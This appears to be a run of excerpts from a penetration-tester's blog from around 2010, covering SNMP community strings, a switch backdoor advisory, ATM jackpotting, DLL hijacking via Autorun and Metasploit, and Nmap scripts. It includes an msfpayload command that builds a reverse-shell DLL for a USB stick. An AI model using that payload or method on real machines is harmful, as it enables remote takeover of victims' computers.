First, if you’ve never fully researched SNMP (Simple Network Management Protocol), I suggest you go do that now because you’re doing yourself a major disservice by not knowing/using the information that’s available through the use of this protocol… not to mention the amount of remote control you have over a machine if you’re able to get an administrative community string.

Most network devices that come with SNMP enabled have two (or more) different community strings. A community string is, basically, the only authentication you need in order to gain access through SNMP. There will be a “read only” community string (usually ‘public’) and a read/write community string (usually ‘private’). Lately, developers have been doing a better job at making sure that the default community strings don’t come with read/write enabled, but not all of them do.

This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. :-)

[BEGIN REGURGITATION of http://www.exploit-db.com/exploits/14875/]

On the 15th of August 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent [1][2]. Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug…

This talk was presented at BlackHat 2010 by Barnaby Jack. It’s about hacking (aka jackpotting) automated teller machines. Pretty interesting.

I decided that it might be useful to be able to utilize DLL hijacking with Autorun. Here’s the outcome.

# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.0.58

This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll). (Best viewed in fullscreen mode in 480p or higher. YouTube absolutely killed the video quality. Thanks YouTube!)

Just to make sure this is clear: the window on the left side of the screen is my Linux box, and the window on the right side is my VMware image of Windows XP SP2.

UPDATE:
One thing that I didn’t mention in this post is that these files do NOT have to be saved to a share. So long as the file and the DLL reside in the same directory (think USB stick), the exploitation will succeed.
/UPDATE

So, yesterday I wrote a post detailing the exploitation of this vulnerability using the “webdav_dll_hijacker” module. The problem with this method is that you have to convince a user to connect to a rogue share. This adds some hoops to jump through, as you have to social engineer/trick someone into browsing to it.

Well, here’s an alternative that doesn’t require any trickery. ;-)


I cannot say enough good things about NSE (Nmap Scripting Engine). I’ve written a couple of posts about it and why I find it so useful, but in this post I’m going to cover some of my favorite scripts that come with the most recent Nmap release (5.35 DC1, the DefCon release... oooh. ;-) ).

The first one is ‘http-enum’. This is a pretty simple directory enumeration script, but the information obtained through the use of this script can be priceless. Here’s an example:


HD Moore (Metasploit) has just released an update to his original DLLHiJackAuditKit, which further automates the process of discovering programs that are vulnerable to this attack. You can find his post here.

And here is the direct link to the zip file.